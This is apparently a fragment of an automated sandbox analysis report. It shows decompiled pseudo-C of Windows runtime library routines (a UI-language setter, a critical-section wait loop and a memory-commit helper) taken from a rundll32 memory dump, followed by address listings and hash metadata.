																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L045E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0460FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0460FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0460FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0460FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0460FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x46c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x46c7b84 = _t75;
						_t73 = E045EEB70(_t134, 0x46c7b60);
						if( *0x46c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E045EFF60( *0x46c7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                            0x0460fab0
                                                                                            0x0460fab2
                                                                                            0x0460fab3
                                                                                            0x0460fab4
                                                                                            0x0460fabc
                                                                                            0x0460fac0
                                                                                            0x0460fb14
                                                                                            0x0460fb17
                                                                                            0x0460fac2
                                                                                            0x0460fac8
                                                                                            0x0460facd
                                                                                            0x0460fad3
                                                                                            0x0460fad3
                                                                                            0x0460fadd
                                                                                            0x0460fb18
                                                                                            0x0460fb1b
                                                                                            0x0460fb1d
                                                                                            0x0460fb1e
                                                                                            0x0460fb1f
                                                                                            0x0460fb20
                                                                                            0x0460fb21
                                                                                            0x0460fb22
                                                                                            0x0460fb23
                                                                                            0x0460fb24
                                                                                            0x0460fb25
                                                                                            0x0460fb26
                                                                                            0x0460fb27
                                                                                            0x0460fb28
                                                                                            0x0460fb29
                                                                                            0x0460fb2a
                                                                                            0x0460fb2b
                                                                                            0x0460fb2c
                                                                                            0x0460fb2d
                                                                                            0x0460fb2e
                                                                                            0x0460fb2f
                                                                                            0x0460fb3a
                                                                                            0x0460fb3b
                                                                                            0x0460fb3e
                                                                                            0x0460fb41
                                                                                            0x0460fb44
                                                                                            0x0460fb47
                                                                                            0x0460fb4a
                                                                                            0x0460fb4d
                                                                                            0x0460fb53
                                                                                            0x0464bdcb
                                                                                            0x0464bdcb
                                                                                            0x0460fb59
                                                                                            0x0460fb5b
                                                                                            0x0460fb5b
                                                                                            0x0460fb5e
                                                                                            0x0464bdd5
                                                                                            0x0464bdd8
                                                                                            0x00000000
                                                                                            0x0464bdda
                                                                                            0x00000000
                                                                                            0x0464bdda
                                                                                            0x0460fb64
                                                                                            0x0460fb64
                                                                                            0x0460fb64
                                                                                            0x0460fb67
                                                                                            0x0460fb6e
                                                                                            0x0460fb70
                                                                                            0x0460fb72
                                                                                            0x00000000
                                                                                            0x0460fb78
                                                                                            0x0460fb7a
                                                                                            0x0460fb7a
                                                                                            0x0460fb7d
                                                                                            0x0460fb80
                                                                                            0x0464bddf
                                                                                            0x0464bde1
                                                                                            0x00000000
                                                                                            0x0464bde3
                                                                                            0x00000000
                                                                                            0x0464bde3
                                                                                            0x0460fb86
                                                                                            0x0460fb86
                                                                                            0x0460fb86
                                                                                            0x0460fb8b
                                                                                            0x0460fb90
                                                                                            0x0460fb92
                                                                                            0x0460fb94
                                                                                            0x0460fb9a
                                                                                            0x0460fb9b
                                                                                            0x0460fba1
                                                                                            0x0464bde8
                                                                                            0x0464bdeb
                                                                                            0x0464bded
                                                                                            0x0464beb5
                                                                                            0x0464beb5
                                                                                            0x0464bebb
                                                                                            0x0464bebd
                                                                                            0x0464bec3
                                                                                            0x0464bed2
                                                                                            0x0464bedd
                                                                                            0x0464bedd
                                                                                            0x0464beed
                                                                                            0x00000000
                                                                                            0x0464bdf3
                                                                                            0x0464bdfe
                                                                                            0x0464be06
                                                                                            0x0464be0b
                                                                                            0x0464be0d
                                                                                            0x0464be0f
                                                                                            0x0464be14
                                                                                            0x0464be19
                                                                                            0x0464be20
                                                                                            0x0464be25
                                                                                            0x0464be27
                                                                                            0x0464be35
                                                                                            0x0464be39
                                                                                            0x0464be46
                                                                                            0x0464be4f
                                                                                            0x0464be54
                                                                                            0x0464be56
                                                                                            0x0464bef8
                                                                                            0x0464bef8
                                                                                            0x00000000
                                                                                            0x0464be5c
                                                                                            0x0464be5c
                                                                                            0x0464be60
                                                                                            0x00000000
                                                                                            0x0464be66
                                                                                            0x0464be66
                                                                                            0x0464be7f
                                                                                            0x0464be84
                                                                                            0x0464be87
                                                                                            0x0464be89
                                                                                            0x0464be8b
                                                                                            0x0464be99
                                                                                            0x0464be9d
                                                                                            0x0464bea0
                                                                                            0x0464beac
                                                                                            0x0464beaf
                                                                                            0x0464beb1
                                                                                            0x0464beb3
                                                                                            0x0464beb3
                                                                                            0x00000000
                                                                                            0x0464bea2
                                                                                            0x0464bea2
                                                                                            0x00000000
                                                                                            0x0464bea2
                                                                                            0x0464be8d
                                                                                            0x0464be8d
                                                                                            0x0464be92
                                                                                            0x00000000
                                                                                            0x0464be92
                                                                                            0x0464be8b
                                                                                            0x0464be60
                                                                                            0x0464be3b
                                                                                            0x0464be3b
                                                                                            0x0464be3e
                                                                                            0x00000000
                                                                                            0x0464be40
                                                                                            0x0464be40
                                                                                            0x0464be44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464be44
                                                                                            0x0464be3e
                                                                                            0x0464be29
                                                                                            0x0464be29
                                                                                            0x00000000
                                                                                            0x0464be29
                                                                                            0x0464be27
                                                                                            0x00000000
                                                                                            0x0460fba7
                                                                                            0x0460fba7
                                                                                            0x0460fbab
                                                                                            0x0464bf02
                                                                                            0x0460fbb1
                                                                                            0x0460fbb1
                                                                                            0x0460fbb8
                                                                                            0x0460fbbd
                                                                                            0x0460fbbd
                                                                                            0x0460fbbf
                                                                                            0x0460fbbf
                                                                                            0x0460fbc5
                                                                                            0x0460fbcb
                                                                                            0x0460fbf8
                                                                                            0x0460fbf8
                                                                                            0x0460fbfa
                                                                                            0x00000000
                                                                                            0x0460fc00
                                                                                            0x0460fc00
                                                                                            0x0460fc03
                                                                                            0x00000000
                                                                                            0x0460fc09
                                                                                            0x0460fc09
                                                                                            0x0460fc0f
                                                                                            0x0460fc15
                                                                                            0x0460fc23
                                                                                            0x0460fc23
                                                                                            0x0460fc25
                                                                                            0x0460fc27
                                                                                            0x0460fc75
                                                                                            0x0460fc7c
                                                                                            0x0460fc84
                                                                                            0x00000000
                                                                                            0x0460fc29
                                                                                            0x0460fc29
                                                                                            0x0460fc2d
                                                                                            0x0460fc30
                                                                                            0x0464bf0f
                                                                                            0x00000000
                                                                                            0x0460fc36
                                                                                            0x0460fc38
                                                                                            0x0460fc3b
                                                                                            0x0460fc41
                                                                                            0x0464bf17
                                                                                            0x0464bf19
                                                                                            0x0464bf48
                                                                                            0x0464bf4b
                                                                                            0x00000000
                                                                                            0x0464bf1b
                                                                                            0x0464bf22
                                                                                            0x0464bf24
                                                                                            0x0464bf26
                                                                                            0x00000000
                                                                                            0x0464bf2c
                                                                                            0x0464bf37
                                                                                            0x0464bf39
                                                                                            0x0464bf3b
                                                                                            0x00000000
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf45
                                                                                            0x00000000
                                                                                            0x0464bf45
                                                                                            0x0464bf3b
                                                                                            0x0464bf26
                                                                                            0x00000000
                                                                                            0x0460fc47
                                                                                            0x0460fc47
                                                                                            0x0460fc49
                                                                                            0x0460fcb2
                                                                                            0x0460fcb4
                                                                                            0x0460fcb6
                                                                                            0x0460fcdc
                                                                                            0x0460fcdc
                                                                                            0x00000000
                                                                                            0x0460fcb8
                                                                                            0x0460fcc3
                                                                                            0x0460fcc5
                                                                                            0x0460fcc7
                                                                                            0x00000000
                                                                                            0x0460fcc9
                                                                                            0x0460fcc9
                                                                                            0x0460fccd
                                                                                            0x00000000
                                                                                            0x0460fccd
                                                                                            0x0460fcc7
                                                                                            0x00000000
                                                                                            0x0460fc4b
                                                                                            0x0460fc4b
                                                                                            0x0460fc4e
                                                                                            0x0460fc4e
                                                                                            0x0460fc51
                                                                                            0x0460fc51
                                                                                            0x0460fc54
                                                                                            0x0460fc5a
                                                                                            0x0460fc5c
                                                                                            0x0460fc5f
                                                                                            0x0460fc61
                                                                                            0x0460fc63
                                                                                            0x0460fc65
                                                                                            0x0460fc67
                                                                                            0x0460fc6e
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc67
                                                                                            0x0460fc61
                                                                                            0x00000000
                                                                                            0x0460fc5a
                                                                                            0x0460fc49
                                                                                            0x0460fc41
                                                                                            0x0460fc30
                                                                                            0x0460fc27
                                                                                            0x0460fc03
                                                                                            0x0460fbcd
                                                                                            0x0460fbd3
                                                                                            0x0460fbd9
                                                                                            0x0460fbdc
                                                                                            0x0460fbde
                                                                                            0x0460fc99
                                                                                            0x0460fc9b
                                                                                            0x0460fc9d
                                                                                            0x0460fcd5
                                                                                            0x0460fcd5
                                                                                            0x0460fc89
                                                                                            0x0460fc89
                                                                                            0x00000000
                                                                                            0x0460fc9f
                                                                                            0x0460fc9f
                                                                                            0x0460fca3
                                                                                            0x00000000
                                                                                            0x0460fca3
                                                                                            0x00000000
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe9
                                                                                            0x0460fbf2
                                                                                            0x00000000
                                                                                            0x0460fbf2
                                                                                            0x0460fbde
                                                                                            0x0460fbcb
                                                                                            0x0460fbab
                                                                                            0x0460fc8b
                                                                                            0x0460fc8b
                                                                                            0x0460fc8c
                                                                                            0x0460fb80
                                                                                            0x0460fb72
                                                                                            0x0460fb5e
                                                                                            0x0460fc8d
                                                                                            0x0460fc91
                                                                                            0x0460fadf
                                                                                            0x0460fadf
                                                                                            0x0460fae1
                                                                                            0x0460fae4
                                                                                            0x0460fae7
                                                                                            0x0460faec
                                                                                            0x0460faf8
                                                                                            0x0460fb00
                                                                                            0x0460fb07
                                                                                            0x0460fb0f
                                                                                            0x0460fb0f
                                                                                            0x0460fb07
                                                                                            0x00000000
                                                                                            0x0460faf8
                                                                                            0x0460fadd

                                                                                            Strings
                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0464BE0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                            • API String ID: 0-865735534
                                                                                            • Opcode ID: 49e82942d3357ed858beb05b9b878562fd80ab5fd8636a98a546269b2f43553a
                                                                                            • Instruction ID: de407975995ed1dc67c1f862fca8cc3cc49b91cebd637443fd204a8b8d837b0f
                                                                                            • Opcode Fuzzy Hash: 49e82942d3357ed858beb05b9b878562fd80ab5fd8636a98a546269b2f43553a
                                                                                            • Instruction Fuzzy Hash: 9DA1C171B006068BEB3DDF65C45177BB3A5AB98B14F04856AD8069B7C0FBB4F942CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 63%
                                                                                            			E045D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x46c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x46c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E046197C0();
				}
				if( *0x46c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x46c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04601624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E045F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0466FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04619520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0460E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0462DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x46c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x46c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04619980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E046195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E045F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E045F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04657016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0466FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x46c5350;
							if(_t109 != 0x46c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0466FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04665720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                            0x045d2d8a
                                                                                            0x045d2d8a
                                                                                            0x045d2d92
                                                                                            0x045d2d96
                                                                                            0x045d2d9e
                                                                                            0x045d2da0
                                                                                            0x045d2da3
                                                                                            0x045d2da5
                                                                                            0x045d2da8
                                                                                            0x045d2dab
                                                                                            0x045d2db2
                                                                                            0x0462f9aa
                                                                                            0x0462f9ab
                                                                                            0x0462f9ae
                                                                                            0x0462f9ae
                                                                                            0x045d2db8
                                                                                            0x045d2dc2
                                                                                            0x0462f9b9
                                                                                            0x0462f9be
                                                                                            0x0462f9bf
                                                                                            0x0462f9bf
                                                                                            0x045d2dcf
                                                                                            0x0462f9c9
                                                                                            0x045d2dd5
                                                                                            0x045d2dd5
                                                                                            0x045d2dd5
                                                                                            0x045d2dde
                                                                                            0x045d2de1
                                                                                            0x045d2e70
                                                                                            0x045d2e72
                                                                                            0x045d2e72
                                                                                            0x045d2de7
                                                                                            0x045d2deb
                                                                                            0x045d2e7c
                                                                                            0x045d2e83
                                                                                            0x045d2e85
                                                                                            0x045d2e8b
                                                                                            0x045d2e8d
                                                                                            0x045d2e92
                                                                                            0x045d2e92
                                                                                            0x045d2e85
                                                                                            0x045d2df1
                                                                                            0x045d2df7
                                                                                            0x045d2df9
                                                                                            0x045d2df9
                                                                                            0x045d2dfc
                                                                                            0x045d2dff
                                                                                            0x045d2e02
                                                                                            0x00000000
                                                                                            0x045d2e05
                                                                                            0x045d2e0c
                                                                                            0x0462f9d9
                                                                                            0x045d2e12
                                                                                            0x045d2e12
                                                                                            0x045d2e12
                                                                                            0x045d2e1a
                                                                                            0x0462f9e3
                                                                                            0x0462f9e9
                                                                                            0x0462f9f0
                                                                                            0x0462f9f6
                                                                                            0x0462f9f8
                                                                                            0x0462f9f8
                                                                                            0x0462f9f0
                                                                                            0x045d2e23
                                                                                            0x0462fa02
                                                                                            0x0462fa03
                                                                                            0x0462fa05
                                                                                            0x0462fa06
                                                                                            0x00000000
                                                                                            0x045d2e29
                                                                                            0x045d2e29
                                                                                            0x045d2e2e
                                                                                            0x045d2e34
                                                                                            0x045d2e3e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d2e44
                                                                                            0x045d2e47
                                                                                            0x045d2e4d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d2e4f
                                                                                            0x045d2e54
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d2e5a
                                                                                            0x045d2e5f
                                                                                            0x045d2e9a
                                                                                            0x045d2ea4
                                                                                            0x045d2ea5
                                                                                            0x045d2ea8
                                                                                            0x045d2eaf
                                                                                            0x045d2eb2
                                                                                            0x045d2eb5
                                                                                            0x0462fae9
                                                                                            0x0462faeb
                                                                                            0x0462faed
                                                                                            0x0462faef
                                                                                            0x0462faf7
                                                                                            0x0462faf8
                                                                                            0x0462fafd
                                                                                            0x0462faff
                                                                                            0x0462fb04
                                                                                            0x0462fb04
                                                                                            0x0462faff
                                                                                            0x045d2ec0
                                                                                            0x045d2ec4
                                                                                            0x045d2ec6
                                                                                            0x045d2ec8
                                                                                            0x0462fb14
                                                                                            0x0462fb18
                                                                                            0x0462fb1e
                                                                                            0x0462fb21
                                                                                            0x0462fb21
                                                                                            0x045d2ece
                                                                                            0x045d2ece
                                                                                            0x045d2ece
                                                                                            0x045d2ed7
                                                                                            0x045d2e61
                                                                                            0x045d2e63
                                                                                            0x0462fa6b
                                                                                            0x0462fa71
                                                                                            0x0462fa76
                                                                                            0x0462fa78
                                                                                            0x0462fa8a
                                                                                            0x0462fa7a
                                                                                            0x0462fa83
                                                                                            0x0462fa83
                                                                                            0x0462fa8f
                                                                                            0x0462fa91
                                                                                            0x0462fa97
                                                                                            0x0462fa9d
                                                                                            0x0462faa4
                                                                                            0x0462faaa
                                                                                            0x0462faaf
                                                                                            0x0462fab1
                                                                                            0x0462fac3
                                                                                            0x0462fab3
                                                                                            0x0462fabc
                                                                                            0x0462fabc
                                                                                            0x0462fac8
                                                                                            0x0462facb
                                                                                            0x0462fadf
                                                                                            0x0462fadf
                                                                                            0x0462facb
                                                                                            0x0462faa4
                                                                                            0x0462fa91
                                                                                            0x045d2e6f
                                                                                            0x045d2e6f
                                                                                            0x045d2e5f
                                                                                            0x0462fa13
                                                                                            0x0462fa15
                                                                                            0x0462fa17
                                                                                            0x0462fa1f
                                                                                            0x0462fa21
                                                                                            0x0462fa22
                                                                                            0x0462fa25
                                                                                            0x0462fa28
                                                                                            0x0462fa2f
                                                                                            0x0462fa2f
                                                                                            0x0462fa2a
                                                                                            0x0462fa2a
                                                                                            0x0462fa2a
                                                                                            0x0462fa31
                                                                                            0x0462fa34
                                                                                            0x0462fa36
                                                                                            0x0462fa3c
                                                                                            0x0462fa3e
                                                                                            0x0462fa41
                                                                                            0x0462fa43
                                                                                            0x0462fa45
                                                                                            0x0462fa45
                                                                                            0x0462fa41
                                                                                            0x0462fa3c
                                                                                            0x0462fa4a
                                                                                            0x0462fa4f
                                                                                            0x0462fa51
                                                                                            0x0462fa53
                                                                                            0x0462fa56
                                                                                            0x0462fa5b
                                                                                            0x0462fa5e
                                                                                            0x00000000
                                                                                            0x0462fa5e
                                                                                            0x045d2e23

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Re-Waiting
                                                                                            • API String ID: 0-316354757
                                                                                            • Opcode ID: 11d05f4426b2b7e2980899771ea2b7fa28417af92b13aa533e68ba955cf56cdc
                                                                                            • Instruction ID: b234e11141278ffa209166fceb078ed2fc436b7b9a29cf5502adf03110b44a2a
                                                                                            • Opcode Fuzzy Hash: 11d05f4426b2b7e2980899771ea2b7fa28417af92b13aa533e68ba955cf56cdc
                                                                                            • Instruction Fuzzy Hash: 4E61F030A00A55FBEB35DF68D940B7AB7B5FF44718F1446AAE812973C0E734B901AB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E046A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0469FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E046A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04619730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0469A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0469A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x46c8b04 >> 0x14) + (_v44 -  *0x46c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E045F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0469138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E045F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0468FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x46c8724 & 0x00000008) != 0) {
						E046952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E046A15B5(0x46c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                            0x046a0eb7
                                                                                            0x046a0eb9
